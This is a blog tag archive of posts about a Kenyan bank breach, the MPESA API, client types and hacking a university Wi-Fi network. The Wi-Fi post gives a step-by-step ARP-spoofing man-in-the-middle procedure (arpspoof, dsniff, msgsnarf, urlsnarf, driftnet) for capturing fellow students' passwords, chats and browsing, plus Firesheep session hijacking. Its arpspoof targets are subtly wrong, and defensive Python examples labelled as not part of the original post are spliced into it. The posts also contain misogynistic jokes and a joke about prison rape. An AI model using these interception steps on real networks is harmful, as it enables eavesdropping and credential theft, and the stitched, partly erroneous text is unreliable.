
Tag Archives: HACK

NIC Bank’s Data Breach, Hack and Subsequent Extortion

Allow me to write this post as a letter to NIC Bank. Despite the numerous times I have advised them to rectify their security to better protect us, their users, it has simply fallen on deaf ears. Well, here goes.


Dear NIC Bank,

How are you? Hope you are well. These days when I wake up every morning I have developed a routine: I read all my tech blogs, check my email and check my NIC Bank portal for fear of a breach, for fear that my hard-earned shillings may have been skimmed by some hungry hacker or, even worse, that my data may have been sold on Silk Road. I know many wonder why I am still banking with you if all I do is complain; I mean, if you constantly argue with your spouse then it's better to walk out and spare yourself the agony, but like a cocaine addict I'm hooked: hooked on your seamless banking process, the short queues in the banking halls, the cute banker chicks you guys have, the asset finance and of course the online banking portal that has proved to be your Achilles heel.

If you have been reading my blog you may be aware I have written 2 posts, the first NIC-BANK’s poor Ebanking System and possible security Flaws dated 24th April 2014 and the second NIC-BANK’s improved Ebanking System subsequent to my Exposé dated 11th November. In the first I alerted you to the gaping holes in your security. I also expressed my fear that someone else may have found this flaw and, not being as noble as me, exploited it for profit. I was pleased when a few months later I noticed you had bumped up your security and added OTP to the online portal. But if you remember, I mentioned that this may be a little too late; I wrote in part:

To begin with, if indeed the data they served was compromised they should have purged the entire username/password combo provided; instead they only solved the issue of passwords. The problem with this is akin to a naked woman only covering her boobies: the rest of her is available for your ocular pleasure. The same applies if I had a set of passwords and usernames and the passwords change without the usernames changing; then I am already at first base if I had the old data. The next thing would be a clever combination of hacking tactics ranging from social engineering, actual key logging on the device to harvest the app's password and generating an OTP afterward, sitting on the data and joining all those IRC chats on the dark web and Tor that list exploits on major brand software and then just cleverly generating the OTPs for yourself, etc.

Fast forward to a couple of days ago: wifey called me up at work and informed me that a couple of guys had been arrested on the grounds of extorting cash for data. Allow me to speak a little about the 2 hacker guys. First, I heavily condemn their extortion of money for data. The 2 guys asked for 200 bitcoins; from this we can see these guys aren’t exactly noobs, but also that they are just average hackers. Allow me to explain why.

There exists a market on the dark web, the other part of the internet where Google doesn’t even dare go, where all the hackers meet and chat, exchange tools etc. I remember the first time I showed wifey the dark web she was blown away by the level of sophistication there; I mean, if you think of the internet we use as 5/10 then the dark web is 10/10. This is the place where kids grow up worshipping Anonymous and the Lulz, the place where Lizard Squad was born and their skills sharpened. Back to said market: it's called Silk Road, and Silk Road buys anything from weapons to kiddie porn. It's like the wild wild west of the Internet. So where am I going with this... allow me to indulge you and generalize as well. Kenyan banks should be aware that there are guys out there who won't send you an email and ask for cash; there are guys who will sell hacked data, attack vectors etc. on Silk Road, and from there the Chinese or Russians will get hold of it and wreak havoc; the things that these guys can do are even beyond the scope of this blog.

Long story short, the 2 guys will probably be found guilty, they will end up in Kamiti and get anally raped, and we will forget about the whole thing. One or two guys will get fired and new ones hired; they will come with bravado and a big Solex padlock to lock the server rooms. But do you think anything will be done? Look at the stock price following the hack: did it even dip a point? No. Look at the queues: did they even shrink by a fraction? No.

These banks need to be monitored by the Central Bank, not only on banking practices but also on security. It's all good that CBK protects your cash from fraudulent manipulation by the banks, but that shouldn't end there; they should protect Wanjiku from Chinese hackers who had a cluster set up in their house with enough brute-force power to use said data hacked by the 2 to make them millions. Kenya has to wake up to the fact that the rest of the world has invested billions in cyber security and is still getting hacked (look at Sony, Xbox etc.); what do you think will happen when these hackers discover easy targets in Kenya/Africa? You will see several hacking rigs being set up and the smart ones won't even move from their desk; the 4 fiber connections to Kenya make remote hacks even easier.

So in parting, NIC, go ahead and sentence them, sure, cast stones on them, but don’t forget you are to blame for what is happening and what will happen.

 


Posted by on January 16, 2015 in code, grad school, hack, idd sallim

 


The Elusive MPESA API that may never be…and More


A lot has been blogged about the MPESA API, and when I say a lot I'm talking about thousands of tweets, blogs, texts etc. When the late Idd Salim (it still hurts me to call him late) was around he delved endlessly into this. Everyone has talked about how devs would be able to leverage said APIs in their systems if Safaricom just agreed to play ball. But you all know Safcom... Safcom is like that pretty chick, big booty, titties from here to Ronga... the whole package. The hardest thing is winning over a girl like this... I mean, the typical approach would be “Wow, pretty girl, you're hot...” But do you think it's the first time she has heard this? Of course not; she will just snub you and twerk that ass somewhere else. Same thing with Safcom: we all approach them telling them the same thing, “Please Safcom, MPESA is cool, just let us code on it,” and Safcom will snub you. But even pretty chicks get lonely; it's not that they don't also want the D. There's someone who will come with a new, different angle; instead of cliché lines he will hit her with unexpected wordplay, “Wow, I like your eyes, and you know a woman is her behind, so why is yours small??” and bam, the chick will be disarmed, like pressing reset on a system. Back to Safcom: someone actually won them over and built an API of sorts (not new news really). I will get to that in a few.

Oh wait, so Safcom just posted that MPESA is down as I write this, for 2 days. Runs to withdraw cash: *sigh*


Back to said API. Bernsoft, sometime last year, successfully developed a system for MPESA that makes MPESA transactions real-time; this is why when you pay DSTV your account gets reconnected immediately, or when you deposit money to your bank from MPESA it's real-time, or why your KPLC payment is more real-time than it was before. They developed this system, called “MPESA Instant Payment Notification (IPN)”, originally for use on Kenya Airways ticketing, then presented it to Safaricom; they liked the idea and thus opened up MPESA for them to integrate with, and so most if not all MPESA Paybill/Buy Goods transactions are now processed through this locally developed system.

Many local companies are using this (I for one do most of my MPESA stuff primarily on said IPN), but this is not foolproof. For starters it's not exactly bi-directional, and it requires integration with a Paybill number. If you have ever tried getting one you will know it's one of the hardest things, hard because the tariffs are CLOSELY guarded and no one can know what, say, Company A pays. Meaning if you dev a system and set up a contract with them you may be charged x and Company A gets charged y where x>y, and you can't do shit about it.

But this was a great leap since it was the first (even a virgin doesn't agree every day after the first time; you have to give her time to digest the awesomeness of the D) hahaha... Moving along swiftly. The problem with Safaricom is that Saf cannot be both the owner of the platform and the gatekeeper of innovations that may run on it. All the innovations devs talk about will not stop them from earning money by coming up with standard licensing fees. However, and important to note, it should not be up to them to decide which ideas they like and therefore which should run on a payment system. This is the same problem AT&T had: because they simultaneously owned Bell Labs, which churned out landmark software technologies, they could decide that a technology that seemed a threat would not run on their network, yet they were virtually a monopoly, the way M-PESA by market positioning is a virtual monopoly. The fact is we cannot let Safaricom stifle innovation and continue to prosper. AT&T was finally split up in 1984 not because of its overwhelming market dominance, but because IT WAS REFUSING TO ALLOW NEW INNOVATIONS TO WORK ON ITS PLATFORMS, thus overall stifling technology.

There are thousands of programmers who could come up with software or games that seamlessly integrate M-PESA as a payment platform for their services without having to go through an approval process where Safaricom technical people are judge and jury, particularly given the integrity issues that have long been raised about these Safaricom IT guys when it comes to dealing with developers.

Another key thing of note: if Safaricom shuts down MPESA today (11:00pm Saturday 9th November to 6.00a.m. on Sunday 10th November), will these rampant outages not cost the economy? 35% of our Kenyan GDP passes through M-PESA when there is no credible redundancy. What if MPESA is out for a week; does the economy stagnate? Potential systemic risks such as banking systems heavily exposed to one economic sector are heavily discouraged, and neither should we say our national transactions are 35% exposed to one payment system and be happy about it, a system which no one but a select few know anything about.

As Salim would say: alright, back to code.

 

Posted by on November 9, 2013 in Uncategorized

 


Types of Code Clients I have met

So someone accused me of only writing about code this and code that, as if you can take code to Nakumatt and get shopping, or to Kamau's butchery and have him cut you half a kilo of meat... of course not; there has to be business involved or, in the words of Uhuru Kenyatta, willing buyer, willing seller... so today I will just talk a little about the two types of willing buyers I know / have had the experience of working for.

I have been taught by time and of course by more seasoned businessmen to divide clients into two broad yet true categories: Clande/chips funga (the side chick / one-night stand) and Girlfriend/wifey.

1. Clande/chips Client


The name speaks for itself: this type is tap and go... no strings attached, no numbers, no nothing. Usually this is my best type of client since everyone goes home happy. A clande client knows point blank what they want and how they want it. They are straightforward: you'll be given your spec doc, deposit and timeline. You do the work, when you finish there's a bit of UAT, and that's it... the story ends there, the final instalment is paid and you both go home happy. In the event you don't get along, you both have the luxury of walking away since you just met and nothing has been invested yet between the two of you.

The good thing about this type of client is that, just like a clande at the bar, you're guaranteed not to sleep hungry. It's cash at hand so you are happy, your landlord is happy and even the real clandes are happy. Moving along.

2. Girlfriend/wifey Client


Now this one is the long-term one... in other words it isn't even strings attached, it's more like ropes. This is the worst client ever. Let me explain using the analogy of a real-world girlfriend. You meet a hot mama, someone you think is a keeper... you start courtship. If you take that leap of faith you should know you will be in it for the long haul, during which she may decide she isn't giving it up (you'll be left waiting outside, man)... the only thing you get are hugs and smooches... you will have to be there for her 24/7 (like customer care)... handling all her hormonal issues and stuff... you get the picture.

Back to the client: you meet a big client <usually some corporate or Gov deal>, you strike a deal with them, a deposit of maybe 30%, you're paid and work begins... 1 month in, system changes have started, some integration with some system they use; 2 months in, HR wants their module... you call a meeting... “this wasn't in the spec doc... blah blah blah”; they look at you: “How much more will it cost us?” You give a figure... and because you're broke you get 20% and carry on coding... 3 months later you have no rent, your girl looks at you in the morning and feels nausea because you have nothing; all you say is “Wait, I'm about to be paid”... they drag payment... and the day they actually give you your loot is a Friday evening, and it's a cheque that will take 3 days to mature, so let's say next week Thursday is when you'll have money. DAFAQ

All the while, that next Monday they tell you to drive to their place to sort some stuff out, as if they gave you a fuel card to use. The girlfriend client will also catch feelings if there is a bug: “and yet we paid you so well...” These are the clients who will ask for refunds, sue you, want you in the office every week etc.

Anyhow, those are my two categories of clients. Hope one of you out there can relate.

In other news, if you haven’t yet tried PesaBox here is the link>>, and here is a brief wiki entry on how it works/what it does.

 

 

Posted by on April 5, 2013 in code, hack, Humour

 


Hacking the JKUAT Wi-Fi.

I get scared at times... not of cliché things like the dark or of being shot by the cops because I come from one of those neighbourhoods. What scares me most is cyber attack... This is going to be a tech post, so if you're not into that kind of thing please click here>>>>

That being said, let me dive head first into the contents. I am a Wi-Fi junkie... I spend more time online than I do with my girlfriend; Wi-Fi has been good to me (when it's not that time of the month when it gets all hormonal)... So why am I afraid???

Well, let's just take it from the top... I share an access point with some 100 or so guys at peak and 4-5 at off peak; the commonest sites visited are Facebook, YouTube and probably Yahoo (I didn't mention Google because it goes without saying). Peak time is usually from 7-10pm and off peak ranges from there. The Wi-Fi network is protected with a WPA2 passphrase and AES encryption (not TKIP). The network is behind a proxy server that runs Squid... and what do we all know about Squid??? Squid sucks at HTTPS (I'd rather go for an ISA server, but then again I'm not JKUAT, I only go to school there).

Now Jaymo, since you have told us all this, how does an attack occur? First, this is purely for educational purposes. One of the easiest attacks uses a little-known tool called Firesheep. OK, Firesheep is f****** easy to use, primarily because it's not standalone software but rather a Firefox add-on... With this nifty add-on you can do a tonne of things to rookie web users... wanna hear like what?

Supposing student X logs on to an access point, say the RUNDA wireless connection. The DHCP server awards him a renewable 1-hour lease on an IP (all without him knowing) and he establishes an Internet connection. He has just been chatting with this fresher chick who gave him her Facebook handle, so student X wants to snoop... He launches his Mozilla and types the URL; seconds later the login page appears, he logs in and continues doing his thing... pretty standard, right???? Well, across the yard Hacker X launches his Firesheep and begins his hack... he notices student X is logged on to Facebook via HTTP instead of HTTPS and decides to steal his session... does a bit of this and that... minutes later he has the exact same Facebook session as student X; while he is at it he even decides to go through this guy's inbox to see if he is still dating that gorgeous chick of his... If that's not scary enough, he goes to Facebook settings, changes the backend email address and Facebook password, logs out and kicks student X out of his own f****** Facebook page... awesome.

How is this being done? Session hijacking... What all Wi-Fi networks have in common is that people will access them to browse (duh), and when they do, someone can easily steal unencrypted session cookies. Session hijacking is the exploitation of a valid computer session (sometimes also called a session key) to gain unauthorized access to information or services in a computer system. In particular, it is used to refer to the theft of a magic cookie used to authenticate a user to a remote server (Squid in my case).
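The thing that makes a captured cookie worthless to a Firesheep user is not anything on the Wi-Fi but how the site sets the cookie. The following is an added example (not part of the original post, and not Facebook's or Squid's code) that audits a set of response headers for the Secure and HttpOnly cookie flags and for a Strict-Transport-Security header; the two header sets it checks are constructed, and the session-cookie name hints are an assumption you would tune per site.

```python
"""Audit HTTP response headers for the cookie exposure behind session hijacking.

Added example, not from the original post. Two controls defeat a Firesheep-style
capture on shared Wi-Fi: the session cookie must only travel over TLS (Secure)
and stay out of reach of page scripts (HttpOnly), and the site must send HSTS so
browsers stop using http:// at all. The inputs below are constructed headers.
"""

# Substrings that usually mark an authentication cookie (assumption: tune per site).
SESSION_NAME_HINTS = ("sess", "sid", "auth", "token", "login")


def parse_set_cookie(value):
    """Split a Set-Cookie value into (cookie name, set of lower-cased attribute names)."""
    parts = [p.strip() for p in value.split(";") if p.strip()]
    if not parts:
        return "", set()
    name = parts[0].partition("=")[0].strip()
    attrs = {p.partition("=")[0].strip().lower() for p in parts[1:]}
    return name, attrs


def looks_like_session_cookie(name):
    lowered = name.lower()
    return any(hint in lowered for hint in SESSION_NAME_HINTS)


def audit_response(headers):
    """headers: list of (name, value) pairs as received. Returns a list of findings."""
    findings = []
    has_hsts = False
    for name, value in headers:
        lname = name.lower()
        if lname == "strict-transport-security":
            has_hsts = True
        elif lname == "set-cookie":
            cookie, attrs = parse_set_cookie(value)
            if not looks_like_session_cookie(cookie):
                continue  # theme/locale cookies are not worth stealing
            if "secure" not in attrs:
                findings.append(f"{cookie}: missing Secure, so it is sent in clear over http://")
            if "httponly" not in attrs:
                findings.append(f"{cookie}: missing HttpOnly, so injected script can read it")
    if not has_hsts:
        findings.append("no Strict-Transport-Security header: browsers will still follow http:// links")
    return findings


# Constructed responses: what a login page might send, weak and hardened.
WEAK_RESPONSE = [
    ("Content-Type", "text/html"),
    ("Set-Cookie", "sessionid=abc123; Path=/"),
    ("Set-Cookie", "theme=dark; Path=/"),
]
HARDENED_RESPONSE = [
    ("Content-Type", "text/html"),
    ("Set-Cookie", "sessionid=abc123; Path=/; Secure; HttpOnly; SameSite=Lax"),
    ("Set-Cookie", "theme=dark; Path=/"),
    ("Strict-Transport-Security", "max-age=31536000; includeSubDomains"),
]

if __name__ == "__main__":
    for label, resp in (("weak", WEAK_RESPONSE), ("hardened", HARDENED_RESPONSE)):
        print(label, audit_response(resp) or ["no findings"])
```

The weak response is exactly the student X situation: the session cookie rides on plain HTTP, so anyone sharing the access point can read it. The hardened one keeps the cookie off http:// entirely and tells the browser never to go there again.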

That's one... next, the bucket-brigade attack, aka the man-in-the-middle attack. This is what good old Wikipedia has to say about the bucket-brigade attack: it is an attack where the attacker makes independent connections with the victims and relays messages between them, making them believe that they are talking directly to each other over a private connection, when in fact the entire conversation is controlled by the attacker. The attacker must be able to intercept all messages going between the two victims and inject new ones, which is straightforward in many circumstances (for example, an attacker within reception range of an unencrypted Wi-Fi wireless access point can insert himself as a man-in-the-middle).

And since I'm in a good mood today I'm going to give you a proof of concept that I actually tried out... First, I'm usually working on a Linux distro called BackTrack... (sorry Windows slaves, Windows can't hack... f*** what you see in the movies).

So open up a shell and get the tools you want; primarily we are going to be doing ARP spoof poisoning, and so we need to get driftnet and dsniff.

So in bash run: sudo apt-get install driftnet dsniff. Next we enable packet forwarding: echo 1 > /proc/sys/net/ipv4/ip_forward, then cat /proc/sys/net/ipv4/ip_forward to confirm; this is to allow the traffic on the network to flow via your machine... then we begin the ARP spoof poisoning.

sudo arpspoof -t <your ip> <router ip>, then split your screen and do the reverse: sudo arpspoof -t <router ip> <your ip>. And that's it, you are primarily the man in the middle here. Now you can have fun with this attack...

An easy one is:

msgsnarf -i eth0, where eth0 is the name of the network interface... you can listen to all the instant message services running, I'm talking MSN, Gtalk... any instant messenger, so you can watch someone chatting.

urlsnarf -i eth0 listens on ports 8080, 80 and 3128; if you're in JKUAT and you use Wi-Fi then you must know what port 3128 is. This one obviously listens to the URLs that are being sent.

If you are interested in passwords then we can go back to dsniff and do that:

sudo dsniff -i eth0, this will listen for any password being sent.

Now if you want to see what student X is viewing online, like pictures, then we switch back to driftnet:

sudo driftnet -i eth0, this will give you a visualization of activity on the network.
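The flip side of the procedure above is what a defender on the same Wi-Fi can see: the gateway's IP suddenly being answered by a second MAC address, and one MAC answering for the gateway and for a host at the same time. The following is an added example (not part of the original post, and not one of the dsniff tools) that runs that check over tcpdump-style ARP reply lines; the log lines, IPs and MACs are constructed, and the gateway address is a parameter the caller supplies.

```python
"""Spot ARP-cache poisoning from the defender's side of the Wi-Fi.

Added example, not from the original post and not one of the dsniff tools. It
reads tcpdump-style ARP reply lines (constructed below) and raises an alert when
an IP that one MAC answered for is suddenly answered by another, and when one MAC
answers for the gateway and for a host at the same time, which is the two-way
poisoning pattern. The gateway address is supplied by the caller.
"""
import re

# Matches e.g. "12:00:01.000 ARP, Reply 10.0.0.1 is-at 00:11:22:aa:bb:01, length 28"
ARP_REPLY = re.compile(
    r"^(?P<ts>\S+) ARP, Reply (?P<ip>\d{1,3}(?:\.\d{1,3}){3}) is-at "
    r"(?P<mac>(?:[0-9a-fA-F]{2}:){5}[0-9a-fA-F]{2})"
)


def parse_arp_replies(lines):
    """Yield (timestamp, ip, mac) for every ARP reply; requests and noise are skipped."""
    for line in lines:
        m = ARP_REPLY.match(line.strip())
        if m:
            yield m.group("ts"), m.group("ip"), m.group("mac").lower()


def detect_arp_spoof(lines, gateway_ip):
    """Return alert strings; each suspicious (ip, mac) pair is reported only once."""
    first_mac = {}      # ip -> MAC that first answered for it
    ips_by_mac = {}     # mac -> set of IPs that MAC has claimed
    reported = set()    # alert keys already raised, so repeats stay quiet
    alerts = []

    def raise_once(key, text):
        if key not in reported:
            reported.add(key)
            alerts.append(text)

    for ts, ip, mac in parse_arp_replies(lines):
        ips_by_mac.setdefault(mac, set()).add(ip)
        owner = first_mac.setdefault(ip, mac)
        if owner != mac:
            label = "gateway" if ip == gateway_ip else "host"
            raise_once(("flip", ip, mac),
                       f"{ts} {label} {ip} now answered by {mac} (first seen at {owner})")
        claimed = ips_by_mac[mac]
        if gateway_ip in claimed and len(claimed) > 1:
            others = ", ".join(sorted(claimed - {gateway_ip}))
            raise_once(("two-way", mac),
                       f"{ts} {mac} answers for gateway {gateway_ip} and for {others}: "
                       "two-way poisoning pattern")
    return alerts


# Constructed capture: a real gateway and host, then a third MAC claiming both.
SAMPLE_ARP_LOG = [
    "12:00:01.000 ARP, Reply 10.0.0.1 is-at 00:11:22:aa:bb:01, length 28",
    "12:00:02.000 ARP, Reply 10.0.0.23 is-at 00:11:22:aa:bb:23, length 28",
    "12:00:03.000 ARP, Reply 10.0.0.1 is-at de:ad:be:ef:00:99, length 28",
    "12:00:03.100 ARP, Reply 10.0.0.23 is-at de:ad:be:ef:00:99, length 28",
    "12:00:04.000 ARP, Request who-has 10.0.0.5 tell 10.0.0.1, length 28",
    "12:00:05.000 ARP, Reply 10.0.0.1 is-at de:ad:be:ef:00:99, length 28",
]

if __name__ == "__main__":
    for alert in detect_arp_spoof(SAMPLE_ARP_LOG, "10.0.0.1"):
        print(alert)
```

Fed a live capture (for instance the output of tcpdump filtered to ARP on the interface), the same two rules give a lab or a small campus network a cheap tripwire for the two-window arpspoof setup described above; on a real network, a legitimate gateway failover will also trip the first rule, so the alert is a prompt to look, not proof on its own.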

That's it... that's why I get afraid... but no biggie. In my next post I will tell you how to protect yourself from any of the above attacks... let me go study for the fluid mechanics CAT.

 

Posted by on September 28, 2011 in hack, INTERNSHIP, JKUAT, true stories

 
